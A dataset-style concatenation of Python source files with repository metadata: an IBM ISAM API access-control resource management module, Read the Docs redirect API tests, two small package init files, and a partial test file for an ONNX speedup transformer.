188b3a1bac708a8619ebef86cc81287d08aa4798 | 28,778 | py | Python | ibmsecurity/isam/web/api_access_control/resources/resources.py | zone-zero/ibmsecurity | 7d3e38104b67e1b267e18a44845cb756a5302c3d | [
"Apache-2.0"
] | 46 | 2017-03-21T21:08:59.000Z | 2022-02-20T22:03:46.000Z | ibmsecurity/isam/web/api_access_control/resources/resources.py | zone-zero/ibmsecurity | 7d3e38104b67e1b267e18a44845cb756a5302c3d | [
"Apache-2.0"
] | 201 | 2017-03-21T21:25:52.000Z | 2022-03-30T21:38:20.000Z | ibmsecurity/isam/web/api_access_control/resources/resources.py | zone-zero/ibmsecurity | 7d3e38104b67e1b267e18a44845cb756a5302c3d | [
"Apache-2.0"
] | 91 | 2017-03-22T16:25:36.000Z | 2022-02-04T04:36:29.000Z | import logging
import os
import ibmsecurity
from ibmsecurity.utilities import tools
logger = logging.getLogger(__name__)
uri = "/wga/apiac/resource/instance"
requires_modules = ["wga"]
requires_version = "9.0.7"
def get_all(isamAppliance, instance_name, resource_server_name, check_mode=False, force=False):
"""
Retrieve a list of all API Access Control Resources
"""
return isamAppliance.invoke_get("Retrieve a list of all API Access Control Resources",
"{0}/{1}/server{2}/resource".format(uri, instance_name, resource_server_name),
requires_modules=requires_modules, requires_version=requires_version)
def get(isamAppliance, instance_name, resource_server_name, resource_name, method,
server_type="standard", check_mode=False, force=False):
"""
Retrieve a single API Access Control Resource
"""
if tools.version_compare(isamAppliance.facts["version"], "10.0.0") < 0:
url = "{0}/{1}/server{2}/resource/{3}{4}?server_type={5}".format(uri, instance_name, resource_server_name,
method, resource_name, server_type)
else:
url = "{0}/{1}/server{2}/resource/{3}{2}{4}?server_type={5}".format(uri, instance_name, resource_server_name,
method, resource_name, server_type)
return isamAppliance.invoke_get("Retrieve a single API Access Control Resource",
url, requires_modules=requires_modules, requires_version=requires_version)
def add(isamAppliance, instance_name, resource_server_name, method, path, policy, server_type="standard",
cors_policy='', static_response_headers=[], url_aliases=[], name=None, rate_limiting_policy=None,
documentation=None, check_mode=False, force=False):
"""
Creating a new API Access Control Resource
"""
instance_exist, warnings = _check_instance_exist(isamAppliance, instance_name)
if force is False:
if instance_exist is False:
warnings.append("{0} does not exist".format(instance_name))
return isamAppliance.create_return_object(warnings=warnings)
else:
server_exist, warnings = _check_server_exist(isamAppliance, instance_name, resource_server_name)
if server_exist is False:
warnings.append("The specified resource server name does not exist")
return isamAppliance.create_return_object(warnings=warnings)
resource_exist, warnings = _check_resource_exist(isamAppliance, instance_name, resource_server_name, method, path)
if force is True or resource_exist is False:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
json_data = {
'method': method,
'policy': policy,
'server_type': server_type,
'cors_policy': cors_policy,
'static_response_headers': static_response_headers,
'url_aliases': url_aliases
}
if tools.version_compare(isamAppliance.facts["version"], "10.0.0") < 0:
json_data['path'] = path
else:
json_data['path'] = "{0}{1}".format(resource_server_name, path)
if name is not None:
json_data['name'] = name
if rate_limiting_policy is not None:
json_data['rate_limiting_policy'] = rate_limiting_policy
if documentation is not None:
json_data['documentation'] = documentation
return isamAppliance.invoke_post(
"Creating a new API Access Control Resource",
"{0}/{1}/server{2}/resource".format(uri, instance_name, resource_server_name),
json_data, requires_modules=requires_modules, requires_version=requires_version)
return isamAppliance.create_return_object(warnings=warnings)
def update(isamAppliance, instance_name, resource_server_name, method, path, policy, server_type="standard",
cors_policy='', static_response_headers=[], url_aliases=[], name=None, rate_limiting_policy=None,
documentation=None, check_mode=False, force=False):
"""
Updating an existing API Access Control Resource
"""
instance_exist, warnings = _check_instance_exist(isamAppliance, instance_name)
if force is False:
if instance_exist is False:
warnings.append("{0} does not exist".format(instance_name))
return isamAppliance.create_return_object(warnings=warnings)
else:
server_exist, warnings = _check_server_exist(isamAppliance, instance_name, resource_server_name)
if server_exist is False:
warnings.append("The specified resource server name does not exist")
return isamAppliance.create_return_object(warnings=warnings)
else:
resource_exist, warnings = _check_resource_exist(isamAppliance, instance_name, resource_server_name,
method, path)
if resource_exist is False:
warnings.append("The specified resource does not exist")
return isamAppliance.create_return_object(warnings=warnings)
update_required, warnings, json_data = _check_resource_content(isamAppliance=isamAppliance,
instance_name=instance_name,
resource_server_name=resource_server_name,
method=method, path=path, policy=policy,
cors_policy=cors_policy, name=name,
static_response_headers=static_response_headers,
rate_limiting_policy=rate_limiting_policy,
url_aliases=url_aliases, documentation=documentation)
if force is True or update_required is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
if tools.version_compare(isamAppliance.facts["version"], "10.0.0") < 0:
url = "{0}/{1}/server{2}/resource/{3}{4}?server_type={5}".format(uri, instance_name,
resource_server_name,
method, path, server_type)
else:
url = "{0}/{1}/server{2}/resource/{3}{2}{4}?server_type={5}".format(uri, instance_name,
resource_server_name,
method, path, server_type)
return isamAppliance.invoke_put(
"Updating an existing API Access Control Resource",
url, json_data, requires_modules=requires_modules, requires_version=requires_version)
return isamAppliance.create_return_object(warnings=warnings)
def set(isamAppliance, instance_name, resource_server_name, method, path, policy, server_type="standard",
cors_policy='', static_response_headers=[], url_aliases=[], name=None, rate_limiting_policy=None,
documentation=None, check_mode=False, force=False):
instance_exist, warnings = _check_instance_exist(isamAppliance, instance_name)
if force is False:
if instance_exist is False:
warnings.append("{0} does not exist".format(instance_name))
return isamAppliance.create_return_object(warnings=warnings)
else:
server_exist, warnings = _check_server_exist(isamAppliance, instance_name, resource_server_name)
if server_exist is False:
warnings.append("The specified resource server name does not exist")
return isamAppliance.create_return_object(warnings=warnings)
resource_exist, warnings = _check_resource_exist(isamAppliance, instance_name, resource_server_name,
method, path)
if resource_exist is True:
return update(isamAppliance=isamAppliance, instance_name=instance_name,
resource_server_name=resource_server_name, method=method, path=path, policy=policy,
server_type=server_type, cors_policy=cors_policy, static_response_headers=static_response_headers,
url_aliases=url_aliases, name=name, rate_limiting_policy=rate_limiting_policy,
documentation=documentation, check_mode=check_mode, force=force)
else:
return add(isamAppliance=isamAppliance, instance_name=instance_name,
resource_server_name=resource_server_name, method=method, path=path, policy=policy,
server_type=server_type, cors_policy=cors_policy, static_response_headers=static_response_headers,
url_aliases=url_aliases, name=name, rate_limiting_policy=rate_limiting_policy,
documentation=documentation, check_mode=check_mode, force=force)
def delete(isamAppliance, instance_name, resource_server_name, method, path, server_type='standard',
check_mode=False, force=False):
"""
Delete an existing API Access Control Resource
"""
instance_exist, warnings = _check_instance_exist(isamAppliance, instance_name)
if force is False:
if instance_exist is False:
warnings.append("{0} does not exist".format(instance_name))
return isamAppliance.create_return_object(warnings=warnings)
else:
server_exist, warnings = _check_server_exist(isamAppliance, instance_name, resource_server_name)
if server_exist is False:
warnings.append("The specified resource server name does not exist")
return isamAppliance.create_return_object(warnings=warnings)
resource_exist, warnings = _check_resource_exist(isamAppliance, instance_name, resource_server_name, method, path)
if force is True or resource_exist is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
if tools.version_compare(isamAppliance.facts["version"], "10.0.0") < 0:
url = "{0}/{1}/server{2}/resource/{3}{4}?server_type={5}".format(uri, instance_name,
resource_server_name,
method, path, server_type)
else:
url = "{0}/{1}/server{2}/resource/{3}{2}{4}?server_type={5}".format(uri, instance_name,
resource_server_name,
method, path, server_type)
return isamAppliance.invoke_delete(
"Delete an existing API Access Control Resource",
url,
requires_modules=requires_modules,
requires_version=requires_version)
return isamAppliance.create_return_object(warnings=warnings)
def delete_selection(isamAppliance, instance_name, resource_server_name, resources, command="DELETE",
server_type="standard", check_mode=False, force=False):
"""
Delete a selection of API Access Control Resources
"""
found_any = False
new_list_resources = []
ret_obj = get_all(isamAppliance, instance_name, resource_server_name)
warnings = ret_obj['warnings']
for resource in resources:
found = False
for obj in ret_obj['data']:
if obj['id'] == resource:
found = True
found_any = True
if found is False:
warnings.append("Did not find resource {0} to delete".format(resource))
else:
new_list_resources.append(resource)
if force is True or found_any is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_put(
"Delete a selection of API Access Control Resources",
"{0}/{1}/server{2}/resource?server_type={3}".format(uri, instance_name, resource_server_name,
server_type),
{
'command': command,
'resources': new_list_resources
},
requires_modules=requires_modules,
requires_version=requires_version, warnings=warnings)
return isamAppliance.create_return_object(warnings=warnings)
def delete_all(isamAppliance, instance_name, resource_server_name, server_type='standard',
check_mode=False, force=False):
"""
Delete all existing API Access Control Resources
"""
instance_exist, warnings = _check_instance_exist(isamAppliance, instance_name)
if force is False:
if instance_exist is False:
warnings.append("{0} does not exist".format(instance_name))
return isamAppliance.create_return_object(warnings=warnings)
else:
server_exist, warnings = _check_server_exist(isamAppliance, instance_name, resource_server_name)
if server_exist is False:
warnings.append("The specified resource server name does not exist")
return isamAppliance.create_return_object(warnings=warnings)
resource_exist, warnings = _check_all_resource(isamAppliance, instance_name, resource_server_name)
if force is True or resource_exist is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_delete(
"Delete all existing API Access Control Resources",
"{0}/{1}/server{2}/resource?server_type={3}".format(uri, instance_name, resource_server_name,
server_type),
requires_modules=requires_modules,
requires_version=requires_version)
return isamAppliance.create_return_object(warnings=warnings)
def export_all(isamAppliance, instance_name, resource_server_name, file_path, check_mode=False, force=False):
"""
Exporting all existing API Access Control Resources
"""
if os.path.exists(file_path) is True:
warn_str = "File {0} already exists".format(file_path)
warnings = [warn_str]
return isamAppliance.create_return_object(warnings=warnings)
instance_exist, warnings = _check_instance_exist(isamAppliance, instance_name)
if force is False:
if instance_exist is False:
warnings.append("{0} does not exist".format(instance_name))
return isamAppliance.create_return_object(warnings=warnings)
else:
server_exist, warnings = _check_server_exist(isamAppliance, instance_name, resource_server_name)
if server_exist is False:
warnings.append("The specified resource server name does not exist")
return isamAppliance.create_return_object(warnings=warnings)
if force is True or server_exist is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
url = "{0}/{1}/server{2}/resource?export=true".format(uri, instance_name, resource_server_name)
return isamAppliance.invoke_get_file(
"Exporting all existing API Access Control Resources",
url,
file_path,
requires_modules=requires_modules,
requires_version=requires_version)
return isamAppliance.create_return_object(warnings=warnings)
def export_file(isamAppliance, instance_name, resource_server_name, method, path, file_path,
server_type="standard", check_mode=False, force=False):
"""
Exporting an existing API Access Control Resource
"""
if os.path.exists(file_path) is True:
warn_str = "File {0} already exists".format(file_path)
warnings = [warn_str]
return isamAppliance.create_return_object(warnings=warnings)
instance_exist, warnings = _check_instance_exist(isamAppliance, instance_name)
if force is False:
if instance_exist is False:
warnings.append("{0} does not exist".format(instance_name))
return isamAppliance.create_return_object(warnings=warnings)
else:
server_exist, warnings = _check_server_exist(isamAppliance, instance_name, resource_server_name)
if server_exist is False:
warnings.append("The specified resource server name does not exist")
return isamAppliance.create_return_object(warnings=warnings)
resource_exist, warnings = _check_resource_exist(isamAppliance, instance_name, resource_server_name, method, path)
if force is True or resource_exist is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
if tools.version_compare(isamAppliance.facts["version"], "10.0.0") < 0:
url = "{0}/{1}/server{2}/resource/{3}{4}?export=true&server_type={5}".format(uri, instance_name,
resource_server_name,
method, path, server_type)
else:
url = "{0}/{1}/server{2}/resource/{3}{2}{4}?export=true&server_type={5}".format(uri, instance_name,
resource_server_name,
method, path,
server_type)
return isamAppliance.invoke_get_file(
"Exporting an existing API Access Control Resource",
url,
file_path,
requires_modules=requires_modules,
requires_version=requires_version)
return isamAppliance.create_return_object(warnings=warnings)
def import_file(isamAppliance, instance_name, resource_server_name, filename,
server_type="standard", check_mode=False, force=False):
"""
Importing an API Access Control Resource(s)
"""
if os.path.exists(filename) is False:
warn_str = "File {0} does not exists".format(filename)
warnings = [warn_str]
return isamAppliance.create_return_object(warnings=warnings)
instance_exist, warnings = _check_instance_exist(isamAppliance, instance_name)
if force is False:
if instance_exist is False:
warnings.append("{0} does not exist".format(instance_name))
return isamAppliance.create_return_object(warnings=warnings)
else:
server_exist, warnings = _check_server_exist(isamAppliance, instance_name, resource_server_name)
if server_exist is False:
warnings.append("The specified resource server name does not exist")
return isamAppliance.create_return_object(warnings=warnings)
if force is True or server_exist is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
url = "{0}/{1}/server{2}/resource?server_type={3}".format(uri, instance_name,
resource_server_name, server_type)
return isamAppliance.invoke_post_files(
"Importing an API Access Control Resource(s)", url,
[
{
'file_formfield': 'config_file',
'filename': filename,
'mimetype': 'application/octet-stream'
}
],
{}, requires_modules=requires_modules, requires_version=requires_version)
return isamAppliance.create_return_object(warnings=warnings)
def _check_instance_exist(isamAppliance, instance_name):
ret_obj = ibmsecurity.isam.web.api_access_control.resources.instances.get_all(isamAppliance)
for obj in ret_obj['data']:
if obj['name'] == instance_name:
return True, ret_obj['warnings']
return False, ret_obj['warnings']
def _check_server_exist(isamAppliance, instance_name, junction_point):
ret_obj = ibmsecurity.isam.web.api_access_control.resources.servers.get_all(isamAppliance, instance_name)
for obj in ret_obj['data']:
if obj['name'] == junction_point:
return True, ret_obj['warnings']
return False, ret_obj['warnings']
def _check_resource_exist(isamAppliance, instance_name, resource_server_name, method, path):
ret_obj = get_all(isamAppliance, instance_name, resource_server_name)
warnings = ret_obj['warnings']
if tools.version_compare(isamAppliance.facts["version"], "10.0.0") < 0:
path_name = path
else:
path_name = "{0}{1}".format(resource_server_name, path)
for obj in ret_obj['data']:
if obj['method'] == method and obj['path'] == path_name:
return True, warnings
return False, warnings
def _check_all_resource(isamAppliance, instance_name, resource_server_name):
ret_obj = get_all(isamAppliance, instance_name, resource_server_name)
warnings = ret_obj['warnings']
if ret_obj['data'] != []:
return True, warnings
else:
return False, warnings
def _check_all_servers(isamAppliance, instance_name):
ret_obj = ibmsecurity.isam.web.api_access_control.servers.get_all(isamAppliance, instance_name)
warnings = ret_obj['warnings']
if ret_obj['data'] != []:
return True, warnings
else:
return False, warnings
def _check_list_resource(isamAppliance, instance_name, resource_server_name, resources):
ret_obj = get_all(isamAppliance, instance_name, resource_server_name)
warnings = ret_obj['warnings']
non_exist = False
for resource in resources:
found = False
for obj in ret_obj['data']:
if obj['id'] == resource:
found = True
if found is False:
non_exist = True
warnings.append("Did not find resource {0}".format(resource))
if non_exist is False:
return True, ret_obj['warnings']
else:
return False, warnings
def _check_list_servers(isamAppliance, instance_name, resource_servers):
ret_obj = ibmsecurity.isam.web.api_access_control.resources.servers.get_all(isamAppliance, instance_name)
warnings = ret_obj['warnings']
non_exist = False
for server in resource_servers:
found = False
for obj in ret_obj['data']:
if obj['name'] == server:
found = True
if found is False:
non_exist = True
warnings.append("Did not find resource server {0}".format(server))
if non_exist is False:
return True, ret_obj['warnings']
else:
return False, warnings
def _check_resource_content(isamAppliance, instance_name, resource_server_name, method, path, policy,
cors_policy, static_response_headers, url_aliases, name, rate_limiting_policy,
documentation):
ret_obj = get(isamAppliance, instance_name, resource_server_name, path, method)
current_data = ret_obj['data']
del current_data['id']
json_data = {
'method': method,
'policy': policy,
'cors_policy': cors_policy,
'static_response_headers': static_response_headers,
'url_aliases': url_aliases
}
if tools.version_compare(isamAppliance.facts["version"], "10.0.0") < 0:
json_data['path'] = path
else:
json_data['path'] = "{0}{1}".format(resource_server_name, path)
if name is not None:
json_data['name'] = name
if rate_limiting_policy is not None:
json_data['rate_limiting_policy'] = rate_limiting_policy
if documentation is not None:
json_data['documentation'] = documentation
sorted_obj1 = tools.json_sort(json_data)
logger.debug("Sorted sorted_obj1: {0}".format(sorted_obj1))
sorted_obj2 = tools.json_sort(current_data)
logger.debug("Sorted sorted_obj2: {0}".format(sorted_obj2))
if sorted_obj1 != sorted_obj2:
logger.info("Changes detected, update needed.")
return True, ret_obj['warnings'], json_data
return False, ret_obj['warnings'], json_data
def compare_one_server(isamAppliance1, isamAppliance2, instance1_name, server1_name, instance2_name=None,
server2_name=None):
"""
Compare resources between two appliances
"""
if instance2_name is None or instance2_name == '':
instance2_name = instance1_name
if server2_name is None or server2_name == '':
server2_name = server1_name
resources1 = get_all(isamAppliance1, instance_name=instance1_name, resource_server_name=server1_name)
resources2 = get_all(isamAppliance2, instance_name=instance2_name, resource_server_name=server2_name)
return tools.json_compare(resources1, resources2)
def compare(isamAppliance1, isamAppliance2):
"""
Compare resources between two appliances
"""
app1_instances = ibmsecurity.isam.web.api_access_control.resources.instances.get_all(isamAppliance1)
app2_instances = ibmsecurity.isam.web.api_access_control.resources.instances.get_all(isamAppliance2)
obj1 = []
obj2 = []
for inst1 in app1_instances['data']:
servers = ibmsecurity.isam.web.api_access_control.resources.servers.get_all(isamAppliance1,
instance_name=inst1['name'])
for srv in servers['data']:
if "servers" in srv:
srvlist = srv['servers'].split(";")
new_str = None
for value in srvlist:
if value.find("server_uuid") == -1 and \
value.find("current_requests") == -1 and \
value.find("total_requests") == -1:
if new_str is None:
new_str = value
else:
new_str = new_str + ";" + value
srv['servers'] = new_str
obj1.append(srv)
resources1 = get_all(isamAppliance1, instance_name=inst1['name'], resource_server_name=srv['name'])
obj1.extend(resources1['data'])
for inst2 in app2_instances['data']:
servers = ibmsecurity.isam.web.api_access_control.resources.servers.get_all(isamAppliance2,
instance_name=inst2['name'])
for srv in servers['data']:
if "servers" in srv:
srvlist = srv['servers'].split(";")
new_str = None
for value in srvlist:
if value.find("server_uuid") == -1 and \
value.find("current_requests") == -1 and \
value.find("total_requests") == -1:
if new_str is None:
new_str = value
else:
new_str = new_str + ";" + value
srv['servers'] = new_str
obj2.append(srv)
resources2 = get_all(isamAppliance2, instance_name=inst2['name'], resource_server_name=srv['name'])
obj2.extend(resources2['data'])
app1_instances['data'].extend(obj1)
app2_instances['data'].extend(obj2)
return tools.json_compare(app1_instances, app2_instances,
deleted_keys=['server_uuid', 'current_requests', 'total_requests'])
| 46.11859 | 120 | 0.613211 | 3,077 | 28,778 | 5.467013 | 0.054924 | 0.059922 | 0.073832 | 0.075853 | 0.88628 | 0.871359 | 0.839555 | 0.775294 | 0.749554 | 0.707407 | 0 | 0.01024 | 0.304364 | 28,778 | 623 | 121 | 46.192616 | 0.830061 | 0.019598 | 0 | 0.690678 | 0 | 0.010593 | 0.101666 | 0.026469 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044492 | false | 0 | 0.012712 | 0 | 0.197034 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e14f485e64e28de530d378160c4a49e514c1db07 | 5,206 | py | Python | readthedocs/api/v3/tests/test_redirects.py | darrowco/readthedocs.org | fa7fc5a24306f1f6a27c7393f381c594ab29b357 | [
"MIT"
] | 19 | 2018-03-28T12:28:35.000Z | 2022-02-14T20:09:42.000Z | readthedocs/api/v3/tests/test_redirects.py | darrowco/readthedocs.org | fa7fc5a24306f1f6a27c7393f381c594ab29b357 | [
"MIT"
] | 274 | 2017-10-10T07:59:04.000Z | 2022-03-12T00:56:03.000Z | readthedocs/api/v3/tests/test_redirects.py | darrowco/readthedocs.org | fa7fc5a24306f1f6a27c7393f381c594ab29b357 | [
"MIT"
] | 13 | 2018-04-03T09:49:50.000Z | 2021-04-18T22:04:15.000Z | from .mixins import APIEndpointMixin
from django.urls import reverse
class RedirectsEndpointTests(APIEndpointMixin):
def test_unauthed_projects_redirects_list(self):
response = self.client.get(
reverse(
'projects-redirects-list',
kwargs={
'parent_lookup_project__slug': self.project.slug,
},
),
)
self.assertEqual(response.status_code, 401)
def test_projects_redirects_list(self):
self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.token.key}')
response = self.client.get(
reverse(
'projects-redirects-list',
kwargs={
'parent_lookup_project__slug': self.project.slug,
},
),
)
self.assertEqual(response.status_code, 200)
response_json = response.json()
self.assertDictEqual(
response_json,
self._get_response_dict('projects-redirects-list'),
)
def test_unauthed_projects_redirects_detail(self):
response = self.client.get(
reverse(
'projects-redirects-detail',
kwargs={
'parent_lookup_project__slug': self.project.slug,
'redirect_pk': self.redirect.pk,
},
),
)
self.assertEqual(response.status_code, 401)
def test_projects_redirects_detail(self):
self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.token.key}')
response = self.client.get(
reverse(
'projects-redirects-detail',
kwargs={
'parent_lookup_project__slug': self.project.slug,
'redirect_pk': self.redirect.pk,
},
),
)
self.assertEqual(response.status_code, 200)
response_json = response.json()
self.assertDictEqual(
response_json,
self._get_response_dict('projects-redirects-detail'),
)
def test_unauthed_projects_redirects_list_post(self):
data = {}
response = self.client.post(
reverse(
'projects-redirects-list',
kwargs={
'parent_lookup_project__slug': self.others_project.slug,
},
),
data,
)
self.assertEqual(response.status_code, 401)
self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.token.key}')
response = self.client.post(
reverse(
'projects-redirects-list',
kwargs={
'parent_lookup_project__slug': self.others_project.slug,
},
),
data,
)
self.assertEqual(response.status_code, 403)
def test_projects_redirects_list_post(self):
data = {
'from_url': '/page/',
'to_url': '/another/',
'type': 'page',
}
self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.token.key}')
response = self.client.post(
reverse(
'projects-redirects-list',
kwargs={
'parent_lookup_project__slug': self.project.slug,
},
),
data,
)
self.assertEqual(response.status_code, 201)
response_json = response.json()
response_json['created'] = '2019-04-29T10:00:00Z'
response_json['modified'] = '2019-04-29T12:00:00Z'
self.assertDictEqual(
response_json,
self._get_response_dict('projects-redirects-list_POST'),
)
def test_projects_redirects_detail_put(self):
data = {
'from_url': '/changed/',
'to_url': '/toanother/',
'type': 'page',
}
self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.token.key}')
response = self.client.put(
reverse(
'projects-redirects-detail',
kwargs={
'parent_lookup_project__slug': self.project.slug,
'redirect_pk': self.redirect.pk,
},
),
data,
)
self.assertEqual(response.status_code, 200)
response_json = response.json()
response_json['modified'] = '2019-04-29T12:00:00Z'
self.assertDictEqual(
response_json,
self._get_response_dict('projects-redirects-detail_PUT'),
)
def test_projects_redirects_detail_delete(self):
self.assertEqual(self.project.redirects.count(), 1)
self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.token.key}')
response = self.client.delete(
reverse(
'projects-redirects-detail',
kwargs={
'parent_lookup_project__slug': self.project.slug,
'redirect_pk': self.redirect.pk,
},
),
)
self.assertEqual(response.status_code, 204)
self.assertEqual(self.project.redirects.count(), 0)
| 32.335404 | 77 | 0.541299 | 470 | 5,206 | 5.746809 | 0.142553 | 0.132173 | 0.085524 | 0.083302 | 0.914846 | 0.874491 | 0.785635 | 0.785635 | 0.768974 | 0.768974 | 0 | 0.021125 | 0.354399 | 5,206 | 160 | 78 | 32.5375 | 0.782505 | 0 | 0 | 0.633803 | 0 | 0 | 0.17307 | 0.108144 | 0 | 0 | 0 | 0 | 0.105634 | 1 | 0.056338 | false | 0 | 0.014085 | 0 | 0.077465 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e15672d34f20b21097c3daf9ea7c6b94f34bbebc | 27 | py | Python | pycklx/__init__.py | robspassky/pycklx | b08992977dfc611e7f6efb50e9b01f4d302020c8 | [
"BSD-2-Clause"
] | null | null | null | pycklx/__init__.py | robspassky/pycklx | b08992977dfc611e7f6efb50e9b01f4d302020c8 | [
"BSD-2-Clause"
] | null | null | null | pycklx/__init__.py | robspassky/pycklx | b08992977dfc611e7f6efb50e9b01f4d302020c8 | [
"BSD-2-Clause"
] | null | null | null | from .core import topickle
| 13.5 | 26 | 0.814815 | 4 | 27 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e1599dd2c00fa4e164af2099ca23f8bee206ad79 | 30 | py | Python | kurac/__init__.py | i-vone/kur.ac | 8c1a7ee0a43f6ec3bb2251115987aba33d57e9f3 | [
"MIT"
] | null | null | null | kurac/__init__.py | i-vone/kur.ac | 8c1a7ee0a43f6ec3bb2251115987aba33d57e9f3 | [
"MIT"
] | null | null | null | kurac/__init__.py | i-vone/kur.ac | 8c1a7ee0a43f6ec3bb2251115987aba33d57e9f3 | [
"MIT"
] | null | null | null | from kurac.kurac import kurac
| 15 | 29 | 0.833333 | 5 | 30 | 5 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 30 | 1 | 30 | 30 | 0.961538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e1be8a8dd647ed1453a5cf915cccd6196fcfeff7 | 38 | py | Python | spatial_graphs/__init__.py | alisonpeard/spatial-louvain | 4d2964a769adc0a9169d8c04fa4bcaff1df42afe | [
"BSD-3-Clause"
] | null | null | null | spatial_graphs/__init__.py | alisonpeard/spatial-louvain | 4d2964a769adc0a9169d8c04fa4bcaff1df42afe | [
"BSD-3-Clause"
] | null | null | null | spatial_graphs/__init__.py | alisonpeard/spatial-louvain | 4d2964a769adc0a9169d8c04fa4bcaff1df42afe | [
"BSD-3-Clause"
] | null | null | null | from .spatial_graphs import * # noqa
| 19 | 37 | 0.736842 | 5 | 38 | 5.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184211 | 38 | 1 | 38 | 38 | 0.870968 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bedb1581c5c82b9f555d24d6dfa0c2d242c06300 | 6,090 | py | Python | _unittests/ut_sklapi/test_onnx_speedup_transformer.py | sdpython/mlprodic | 9367dacc91d35ec670c8a8a76708300a75bbc993 | [
"MIT"
] | 32 | 2018-03-04T23:33:30.000Z | 2022-03-10T19:15:06.000Z | _unittests/ut_sklapi/test_onnx_speedup_transformer.py | sdpython/mlprodic | 9367dacc91d35ec670c8a8a76708300a75bbc993 | [
"MIT"
] | 184 | 2017-11-30T14:10:35.000Z | 2022-02-21T08:29:31.000Z | _unittests/ut_sklapi/test_onnx_speedup_transformer.py | sdpython/mlprodic | 9367dacc91d35ec670c8a8a76708300a75bbc993 | [
"MIT"
] | 9 | 2019-07-24T13:18:00.000Z | 2022-03-07T04:08:07.000Z | """
@brief test log(time=4s)
"""
from io import BytesIO
import pickle
import unittest
from logging import getLogger
import numpy
# import pandas
# from sklearn.pipeline import make_pipeline
from sklearn.decomposition import PCA
from sklearn.datasets import load_iris
from pyquickhelper.pycode import ExtTestCase
from mlprodict.sklapi import OnnxSpeedupTransformer
from mlprodict.tools import get_opset_number_from_onnx
from mlprodict.onnx_conv import to_onnx
from mlprodict.onnxrt import OnnxInference
class TestOnnxSpeedupTransformer(ExtTestCase):
def setUp(self):
logger = getLogger('skl2onnx')
logger.disabled = True
def opset(self):
return get_opset_number_from_onnx()
def test_speedup_transform32(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset())
spd.fit(X)
spd.assert_almost_equal(X, decimal=5)
def test_speedup_transform32_onnxruntime(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(
PCA(), target_opset=self.opset(),
runtime="onnxruntime1")
spd.fit(X)
spd.assert_almost_equal(X, decimal=5)
def test_speedup_transform32_numpy(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(
PCA(), target_opset=self.opset(),
runtime="numpy")
spd.fit(X)
spd.assert_almost_equal(X, decimal=5)
def test_speedup_transform32_numba(self):
data = load_iris()
X, _ = data.data, data.target
X = X.astype(numpy.float32)
spd = OnnxSpeedupTransformer(
PCA(), target_opset=self.opset(),
runtime="numba")
spd.fit(X)
spd.assert_almost_equal(X, decimal=5)
self.assertIn("CPUDispatch", str(spd.onnxrt_.func))
def test_speedup_transform64(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset(),
enforce_float32=False)
spd.fit(X)
spd.assert_almost_equal(X)
def test_speedup_transform64_op_version(self):
data = load_iris()
X, _ = data.data, data.target
